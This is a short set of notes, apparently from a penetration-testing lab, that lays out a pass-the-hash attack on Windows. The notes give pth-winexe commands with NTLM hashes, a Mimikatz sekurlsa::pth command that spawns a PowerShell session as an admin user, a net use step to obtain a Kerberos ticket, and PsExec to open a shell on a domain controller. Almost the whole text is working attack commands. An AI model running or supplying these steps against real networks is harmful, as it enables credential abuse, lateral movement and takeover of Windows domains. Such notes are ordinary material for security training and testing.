Pass the NTLM hash

winexe -U jenkins/administrator // cmd.exe

tried pth-winexe -U jenkins/administrator // cmd.exe

Paste the NTLM hash when prompted. (this may be the go to!)

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e // cmd


sekurlsa::pth /user:jeff_admin / /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe

At this point, we have a new PowerShell session that allows us to execute commands as Jeff_Admin.

Let's list the cached Kerberos tickets with klist:

No Kerberos tickets have been cached, but this is expected since the account has not performed an interactive login. However, let's generate a TGT by authenticating to a network share on the domain controller with net use:

PS C:\Windows\system32> net use \\dc01
The command completed successfully.

PS C:\Windows\system32> klist

Now run .\PsExec.exe \dc01 cmd.exe

Last updated